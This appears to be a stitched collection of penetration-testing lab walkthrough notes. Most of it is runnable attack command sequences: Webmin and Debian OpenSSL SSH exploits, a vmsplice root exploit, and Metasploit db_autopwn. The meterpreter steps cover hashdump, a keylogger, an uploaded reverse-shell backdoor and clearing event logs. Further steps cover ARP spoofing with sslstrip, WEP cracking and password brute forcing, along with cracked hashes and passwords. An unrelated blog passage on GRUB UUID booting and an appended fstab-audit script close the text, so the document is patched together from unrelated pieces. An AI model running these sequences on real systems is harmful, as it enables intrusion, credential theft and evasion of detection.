nmap 192.168.3.1-255
nmap -sV -sS -O 192.168.3.100
firefox http://192.168.3.100
firefox http://192.168.3.100:10000
firefox -> milw0rm/explo.it -> search "Webmin" -> save. Filename: webmin.pl/php
*Webmin <> save. Filename: shadow
firefox -> milw0rm/explo.it -> search "Debian OpenSSL" -> save. Filename: ssh.py/rb
*Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit*
http://milw0rm.com/exploits/5622 (perl)
http://milw0rm.com/exploits/5720 (python)
http://milw0rm.com/exploits/5632 (ruby)
http://www.exploit-db.com/exploits/5622 (perl)
http://www.exploit-db.com/exploits/5720 (python)
http://www.exploit-db.com/exploits/5632 (ruby)
wget http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2
perl webmin.pl 192.168.3.100 10000 /home/vmware/.ssh/authorized_keys
perl webmin.pl 192.168.3.100 10000 /home/obama/.ssh/authorized_keys
perl webmin.pl 192.168.3.100 10000 /home/osama/.ssh/authorized_keys
perl webmin.pl 192.168.3.100 10000 /home/yomama/.ssh/authorized_keys
tar jxvf debian_ssh_rsa_2048_x86.tar.bz2
cd rsa/2048
grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEAzASM/LKs+FLB7zfmy14qQJUrsQsEOo9FNkoilHAgvQuiE5Wy9DwYVfLrkkcDB2uubtMzGw9hl3smD/OwUyXc/lNED7MNLS8JvehZbMJv1GkkMHvv1Vfcs6FVnBIfPBz0OqFrEGf+a4JEc/eF2R6nIJDIgnjBVeNcQaIM3NOr1rYPzgDwAH/yWoKfzNv5zeMUkMZ7OVC54AovoSujQC/VRdKzGRhhLQmyFVMH9v19UrLgJB6otLcr3d8/uAB2ypTw+LmuIPe9zqrMwxskdfY4Sth2rl6D3bq6Fwca+pYh++phOyKeDPYkBi3hx6R3b3ETZlNCLJjG7+t7kwFdF02Iuw rsa/2048/*.pub
grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEAxRuWHhMPelB60JctxC6BDxjqQXggf0ptx2wrcAw09HayPxMnKv+BFiGA/I1yXn5EqUfuLSDcTwiIeVSvqJl3NNI5HQUUc6KGlwrhCW464ksARX2ZAp9+6Yu7DphKZmtF5QsWaiJc7oV5il89zltwBDqR362AH49m8/3OcZp4XJqEAOlVWeT5/jikmke834CyTMlIcyPL85LpFw2aXQCJQIzvkCHJAfwTpwJTugGMB5Ng73omS82Q3ErbOhTSa5iBuE86SEkyyotEBUObgWU3QW6ZMWM0Rd9ErIgvps1r/qpteMMrgieSUKlF/LaeMezSXXkZrn0x+A2bKsw9GwMetQ rsa/2048/*.pub
*scans for the public key...*
ssh -i dcbe2a56e8cdea6d17495f6648329ee2-4679 obama@192.168.3.100
exit
ssh -i d8629ce6dc8f2492e1454c13f46adb26-4566 vmware@192.168.3.100
hostname
uname -a
firefox -> milw0rm/explo.it -> search "Linux Kernel 2.6" -> save. Filename: vmsplice.c
*Linux Kernel 2.6.17 - 2.6.24.1 vmsplice Local Root Exploit*
http://milw0rm.com/exploits/5092 (c)
http://www.exploit-db.com/exploits/5092 (c)
nano vmsplice.c
gcc vmsplice.c -o vmsplice
./vmsplice
whoami
----------------------------------------------------------------------------------------------------
Users
root: root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
vmware: vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama: obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama: osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama: yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
----------------------------------------------------------------------------------------------------
>Setup & run an exploit. What do I need?
>Use nmap to scan.
>Use db_autopwn (to exploit the masses!)
>Gather information about the target
>Read, download and upload files
>Run scripts
>Create & use a backdoor.
cd /pentest/exploits/framework3/
./msfconsole
db_create g0tmi1k
db_hosts
db_add_host 10.0.0.4
db_hosts
#show ##Show everything! [wasn't in video]
use windows/smb/ms06_040_netapi
#use windows/dcerpc/ms03_026_dcom ##Different exploit, didn't find it as reliable
#set payload windows/shell_bind_tcp ##Could do a windows shell (not as powerful as meterpreter)
#set payload windows/meterpreter/reverse_tcp ##Could do a meterpreter (but we do it later!)
set payload windows/vncinject/bind_tcp
show options
set lhost 10.0.0.6
show options
exploit
db_del_host 10.0.0.4
db_hosts
db_nmap -n -O 10.0.0.1-5
db_hosts
db_autopwn -t -p -e
sessions -l
sessions -i 1
sysinfo
#ipconfig ##IP information [wasn't in video]
idletime
ps
kill [number]
getuid
#migrate // getsystem // use priv ##If the exploit doesn't have system privileges! [wasn't in video]
hashdump
# execute ## Runs a command [wasn't in video]
shell
pwd
ls
cd C:/
ls
mkdir g0tmi1k
ls
cd g0tmi1k
cat C:/boot.ini
download C:/boot.ini /tmp/boot.ini
./msfpayload windows/meterpreter/reverse_tcp lhost=10.0.0.6 X > /tmp/g0tmi1k.exe
upload /tmp/g0tmi1k.exe C:/g0tmi1k/g0tmi1k.exe
run getgui -u g0tmi1k -p haveyou
run keylogrecorder
## More scripts: /pentest/exploits/framework3/scripts/meterpreter
#run scraper ##Gets information about target, dumps reg etc[wasn't in video]
#run vnc ##Setups VNC [wasn't in video]
#run uploadexec ##Upload and run a program [wasn't in video]
clearev
exit -y
exit -y
##Start fresh for the backdoor!
./msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.0.6
exploit
## Somehow run: C:\g0tmi1k\g0tmi1k.exe
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 192.168.1.104 192.168.1.1
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
sslstrip -p -k -f
/pentest/sniffers/hamster/ferret -i eth0
/pentest/sniffers/hamster/hamster
Konqueror -> Settings -> Configure Konqueror -> Proxy -> Manually. 127.0.0.1:1234
Konqueror -> http://hamster
airmon-ng stop mon0
airmon-ng start wlan0
airodump-ng --channel 8 --write output --bssid 00:19:5B:E7:52:70 mon0
aireplay-ng --arpreplay -e g0tmi1k -b 00:19:5B:E7:52:70 -h 00:12:17:94:90:0D mon0
aireplay-ng --deauth 10 -a 00:19:5B:E7:52:70 -c 00:12:17:94:90:0D mon0
aircrack-ng output*.cap
ifconfig wlan0 down
iwconfig wlan0 essid g0tmi1k
iwconfig wlan0 key 59EF19C76A
ifconfig wlan0 up
dhclient wlan0
Notes:
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth1 -t 10.0.0.3 10.0.0.9
arpspoof -i eth1 -t 10.0.0.9 10.0.0.3
wireshark -i eth1 -k
python chap2asleap.py
python chap2asleap.py -u g0tmi1k -c 3fb0e397540e8aa3df5eb08b0053092c -r df7661696051401f7192726630558ac200000000000000003c4b7c76ae82dd3050006c53d0bc6012db000acba0c5fec600 -x -v
cd /pentest/passwords/wordlists.lst
cat darkc0de.lst | thc-pptp-bruter -u g0tmi1k -n 99 -l 999 10.0.0.3
nmap -n 192.168.2.1-255
nmap -n -sV -sS -O 192.168.2.100
nmap -n -sV -sS -O 192.168.2.101
firefox 192.168.2.100
[+]kate -> list of possible usernames. Save. Filename: usernames.txt
firefox 192.168.2.101
[+]BackTrack -> Vulnerability Identification -> Fuzzers -> JBroFuzz. Web Directories -> List of usernames (+ root, admin) with '~' in front. -> http://192.168.2.101 -> 80
firefox http://192.168.2.101/~pirrip
[+]kate -> Update usernames with the ones which we got a respond from. Save.
[+]BackTrack -> Web Application Analysis -> Web (frontend) -> nikto2
./nikto.pl -host 192.168.2.101 -r ~pirrip/ -Display 124
firefox http://192.168.2.101/~pirrip/.ssh
// Save both files
mv /root/id_rsa /root/.ssh/id_rsa
mv /root/id_rsa.pub /root/.ssh/id_rsa.pub
chmod 000 /root/.ssh/id_rsa
chmod 000 /root/.ssh/id_rsa.pub
ssh pirrip@192.168.2.100
// Yes
mailx
// 3 - we see that havisham's password is 'changeme'. 7 - we see that pirrip's password is '0l1v3rTw1st'
cd /etc/
vi passwd
// kate -> Update usernames with only valid ones.
vi group
sudo vi shadow
// edit (D, :22,22y, :put, i, root, ESCape, ESCape, d + [->],[up],d d). Save it (:w), exit (:q). Password: 0l1v3rTw1st
su
// Password: 0l1v3rTw1st
cd /root/
ls -a
cd .save/
ls -a
chmod -R 777 /root/
//In BackTrack//
scp pirrip@192.168.2.100:/root/.save/great_expectations.zip /root/
unzip great_expectations.zip
tar xf great_expectations.tar
strings Jan08
//In SSH//
sudo vi /var/mail/havisham
modprobe capability
//In BackTrack//
ftp 192.168.2.100
// Username: pirrip. Password: 0l1v3rTw1st //
ls -a
//In SSH//
exit
//In BackTrack//
[+]Firefox -> Send a REAL email to: philip.pirrip.ge@gmail.com
// GAME OVER
----------------------------------------------------------------------------------------------------
Users
root:P1ckw1ckP@p3rs root:$1$/Ta1Q0lT$CSY9sjWR33Re2h5ohV4MX/:13882:0:::::
havisham:changeme havisham:$1$qbY1hmdT$sVZn89wKvmLn0wP2JnZay1:13882:0:99999:7:::
pirrip:0l1v3rTw1st pirrip:$1$KEj04HbT$ZTn.iEtQHcLQc6MjrG/Ig/:13882:0:99999:7:::
magwitch: magwitch:$1$qG7/dIbT$HtTD946DE3ITkbrCINQvJ0:13882:0:99999:7:::
----------------------------------------------------------------------------------------------------
nmap -n 192.168.1.1-255
nmap -n -sS -sV -O 192.168.1.100
firefox 192.168.1.100
[+]kate -> make list of possible usernames. Save. Filename: usernames
// lastF, fLast
hydra 192.168.1.100 ssh2 -L /root/usernames -p password -e s
ssh bbanter@192.168.1.100
// "Yes" if asked about trusting authenticity. Password: bbanter
cd /etc/
cat passwd
[+]kate -> Update usernames. Save.
cat group
exit
cd /root/tools/dictionary/
cat common-1 common-2 common-3 common-4 wordlist.txt >> /root/passwords
hydra 192.168.1.100 ssh2 -V -l aadams -P /root/passwords
ssh aadams@192.168.1.100
// Password: nostradamus
cd /etc/
sudo cat shadow
// Password: nostradamus
[+]kate -> New -> Paste -> Save. Filename: shadow
exit
john
./john --rules --wordlist=/root/passwords --users=root /root/shadow
// Password: tarot
ssh aadams@192.168.1.100
// Password: nostradamus
su
// Password: tarot
ls -a
cd ..
ls -a
cd ftp/
ls -a
cd incoming/
ls -a
openssl enc -d -aes-128-cbc -in salary_dec2003.csv.enc -out salary.csv -k tarot
cd /etc/
vi vsftpd.conf
// edit (by pressing i) vsftpd.conf to have a '#' in front of 'listen=YES' (last line). Then save it (:w), and exit (:quit)
modprobe capability
exit
exit
ftp 192.168.1.100
// User: root. Password: tarot
ls -a
cd ..
ls -a
cd home
ls -a
cd ftp
ls -a
cd incoming
ls -a
get salary.csv
cd /pentest/passwords/jtr
ls
mv salary.csv ~
[+]kate -> salary.csv
// GAME OVER
----------------------------------------------------------------------------------------------------
Users
root:tarot = root:$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:13553:0:::::
aadams:nostradamus = aadams:$1$6cP/ya8m$2CNF8mE.ONyQipxlwjp8P1:13550:0:99999:7:::
bbanter:bbanter = bbanter:$1$hl312g8m$Cf9v9OoRN062STzYiWDTh1:13550:0:99999:7:::
ccoffee:hierophant = ccoffee:$1$nsHnABm3$OHraCR9ro.idCMtEiFPPA.:13550:0:99999:7:::
----------------------------------------------------------------------------------------------------
nmap -n 192.168.1.1-255
nmap -n -sS -sV -O 192.168.1.110
firefox 192.168.1.110
[+]kate -> make list of possible usernames
// lastF, fLast
ftp 192.168.1.110
// Username: anonymous. Password: [Blank]
ls -a
cd download
ls -a
cd etc
ls -a
get core
exit
strings core
[+]Copy from 'root:$...' to '[EOF]'. Kate -> New -> Paste. Format so each username is on its own line -> Save. Filename: shadow
cd tools/dictionary/
cat common-1 common-2 common-3 common-4 wordlist.txt >> /root/passwords
john
./john --rules --wordlist=/root/passwords /root/shadow
//Password: root:Complexity & ccoffee:Diatomaceous
ssh ccoffee@192.168.1.110
//Password: Diatomaceous
ls -a
cd ..
ls -a
cd root/
ls -a
cd .save/
su
//Password: Complexity
cd .save/
ls -a
cat copy.sh
openssl enc -d -aes-256-cbc -salt -in customer_account.csv.enc -out customer_account.csv -pass file:/etc/ssl/certs/pw
ls -a
cat customer_account.csv
// GAME OVER
----------------------------------------------------------------------------------------------------
Users
root:Complexity = root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::
aadams: = aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0:99999:7:::
bbanter:Zymurgy = bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0:99999:7:::
ccoffee:Diatomaceous = ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::
----------------------------------------------------------------------------------------------------
fix-splash800
bash /media/cdrom0/VBoxLinuxAdditions-x86.run
nano /root/.bash_profile
start-network
startx
apt-get -y update
apt-get -y upgrade
apt-get update && apt-get dist-upgrade -y
/pentest/exploits/fast-track.py -i
apt-get install crark
apt-get install wbox
apt-get install vlc
title Main Linux OS
root (hd0,2)
kernel /boot/vmlinuz-2.6.31-17-generic root=/dev/sda3 ro quiet splash
initrd /boot/initrd.img-2.6.31-17-generic
quiet
So I went away on holidays and I hooked my hard disk up to a computer via USB and then booted off it. The Grub menu appeared, and I simply hit Enter to boot into Linux. It booted up fine and everything worked.

kernel /boot/vmlinuz-2.6.31-17-generic root=/dev/sda3 ro quiet splash
to:
kernel /boot/vmlinuz-2.6.31-17-generic root=/dev/sdb3 ro quiet splash

After I made that change, I pressed B to boot up Linux, and it booted up fine. (I didn't need to change root (hd0,2) to root (hd1,2)).

proc /proc proc defaults 0 0
/dev/sda3 / ext3 relatime,errors=remount-ro 0 1

As you can see, my Linux partition was referred to as "/dev/sda3" in my fstab file. Even on the computers where my hard disk was designated as sdb at boot-time, this fstab entry didn't cause any problems (you'd think I would have had to change it to sdb!). Even though my own Linux partition was designated as sdb3 at boot-time, it appears as though it was known as sda3 by the time it came to mounting the root filesystem. (Don't ask me, I haven't got a clue either).

title Main Linux OS
uuid 8c5055d5-75e5-5f57-9585-5a5525551524
kernel /boot/vmlinuz-2.6.31-17-generic root=UUID=8c5055d5-75e5-5f57-9585-5a5525551524 ro quiet splash
initrd /boot/initrd.img-2.6.31-17-generic
quiet

And here's my fstab:
proc /proc proc defaults 0 0
UUID=8c5055d5-75e5-5f57-9585-5a5525551524 / ext3 relatime,errors=remount-ro 0 1

After I made those changes, it booted every time on every computer. Notice, in these two files, that there's no reference to the hard disk number or even the partition number. You can move this Linux partition around however you like, you can change the partition order on your current hard disk, or you can move the Linux partition to a different hard disk. Your Linux installation should still boot right away without a problem because it's working off the UUID of the partition.

sudo blkid | sort
Also, another little cool thing I found is the "/dev/disk" folder. Navigate into that folder and take a look around!
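The before/after GRUB and fstab entries above can be checked mechanically before a disk is moved. This added example (not code from the post) audits an fstab and a GRUB legacy menu.lst for entries that still name a disk by /dev/sdX path rather than by UUID; the function names and the sample files it writes are constructed here from the post's own entries.

```shell
# Added example, not code from the post: flag fstab and GRUB menu.lst entries
# that reference a disk by /dev/sdX path instead of UUID, the setting that broke
# when the post's disk enumerated as sdb on another machine. Sample files below
# are constructed from the post's own before/after entries.
# UUID=/LABEL=/by-* specs survive a disk move, /dev/sdX specs do not,
# and pseudo-filesystems such as proc are neither.
classify_spec() {
    case "$1" in
        UUID=*|LABEL=*|/dev/disk/by-*) echo portable ;;
        /dev/*) echo device-bound ;;
        *) echo other ;;
    esac
}
# Print "<spec> <mountpoint> device-bound" per offending fstab entry;
# return 1 if any was found, else 0.
audit_fstab() {
    rc=0
    while read -r spec mnt rest; do
        case "$spec" in ''|'#'*) continue ;; esac
        if [ "$(classify_spec "$spec")" = device-bound ]; then
            printf '%s %s device-bound\n' "$spec" "$mnt"; rc=1
        fi
    done < "$1"
    return $rc
}
# Same check for the root= argument of every "kernel" line in a menu.lst.
audit_grub() {
    rc=0
    for spec in $(sed -n 's/^[[:space:]]*kernel[[:space:]].*root=\([^[:space:]]*\).*/\1/p' "$1"); do
        if [ "$(classify_spec "$spec")" = device-bound ]; then
            printf '%s device-bound\n' "$spec"; rc=1
        fi
    done
    return $rc
}
# Write the post's old (device path) and new (UUID) files into a temp dir.
make_samples() {
    d=$(mktemp -d)
    printf '%s\n' 'proc /proc proc defaults 0 0' '/dev/sda3 / ext3 relatime,errors=remount-ro 0 1' > "$d/fstab-old"
    printf '%s\n' 'proc /proc proc defaults 0 0' 'UUID=8c5055d5-75e5-5f57-9585-5a5525551524 / ext3 relatime,errors=remount-ro 0 1' > "$d/fstab-new"
    printf '%s\n' 'root (hd0,2)' 'kernel /boot/vmlinuz-2.6.31-17-generic root=/dev/sda3 ro quiet splash' > "$d/menu-old"
    printf '%s\n' 'uuid 8c5055d5-75e5-5f57-9585-5a5525551524' 'kernel /boot/vmlinuz-2.6.31-17-generic root=UUID=8c5055d5-75e5-5f57-9585-5a5525551524 ro quiet splash' > "$d/menu-new"
    echo "$d"
}

samples=$(make_samples)
for f in fstab-old fstab-new menu-old menu-new; do
    case "$f" in fstab*) audit_fstab "$samples/$f" ;; *) audit_grub "$samples/$f" ;; esac && echo "$f: OK"
done
```

Run it against the real files with `audit_fstab /etc/fstab` and `audit_grub /boot/grub/menu.lst`; a non-zero return means at least one entry will break if the disk enumerates differently.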